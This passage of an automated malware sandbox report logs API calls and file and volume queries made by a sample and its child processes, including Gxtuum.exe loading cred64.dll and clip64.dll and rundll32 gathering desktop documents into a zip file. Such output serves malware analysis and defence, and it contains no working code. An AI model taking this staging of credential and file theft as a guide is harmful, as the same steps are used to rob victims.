                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: GetLocaleInfoW,18_2_004F2DA8
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_004F2E77
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,19_2_00342516
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,19_2_003427B8
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,19_2_00342803
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,19_2_003388AC
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,19_2_0034289E
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,19_2_00342929
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,19_2_00342B7C
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_00342CA2
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,19_2_00342DA8
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,19_2_00338DCE
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_00342E77
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,20_2_00342516
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,20_2_003427B8
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,20_2_00342803
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,20_2_003388AC
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,20_2_0034289E
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,20_2_00342929
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,20_2_00342B7C
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,20_2_00342CA2
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,20_2_00342DA8
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,20_2_00338DCE
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,20_2_00342E77
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\audiodg.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\ucrtbase.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962 VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962 VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962 VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962 VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\_ctypes.pyd VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962 VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-console-l1-1-0.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-datetime-l1-1-0.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-errorhandling-l1-1-0.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-file-l1-2-0.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-handle-l1-1-0.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-heap-l1-1-0.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-interlocked-l1-1-0.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-localization-l1-2-0.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-memory-l1-1-0.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-namedpipe-l1-1-0.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-processenvironment-l1-1-0.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-processthreads-l1-1-0.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-rtlsupport-l1-1-0.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-string-l1-1-0.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-sysinfo-l1-1-0.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-util-l1-1-0.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-locale-l1-1-0.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-math-l1-1-0.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-process-l1-1-0.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-stdio-l1-1-0.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\libffi-7.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15962 VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\Desktop\FACWLRWHGG VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\Desktop\ZSSZYEFYMU VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\Documents\PSAMNLJHZW VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeQueries volume information: C:\Users\user\Videos VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll VolumeInformation
                          Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\FACWLRWHGG.docx VolumeInformation
                          Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\MNULNCRIYC.docx VolumeInformation
                          Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\MNULNCRIYC.xlsx VolumeInformation
                          Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\NHPKIZUUSG.xlsx VolumeInformation
                          Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\PSAMNLJHZW.docx VolumeInformation
                          Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\QVTVNIBKSD.docx VolumeInformation
                          Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\QVTVNIBKSD.xlsx VolumeInformation
                          Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\TQDGENUHWP.xlsx VolumeInformation
                          Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\FACWLRWHGG.docx VolumeInformation
                          Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\MNULNCRIYC.docx VolumeInformation
                          Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\MNULNCRIYC.xlsx VolumeInformation
                          Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\NHPKIZUUSG.xlsx VolumeInformation
                          Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\PSAMNLJHZW.docx VolumeInformation
                          Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\QVTVNIBKSD.docx VolumeInformation
                          Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\QVTVNIBKSD.xlsx VolumeInformation
                          Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\TQDGENUHWP.xlsx VolumeInformation
                          Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                          Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
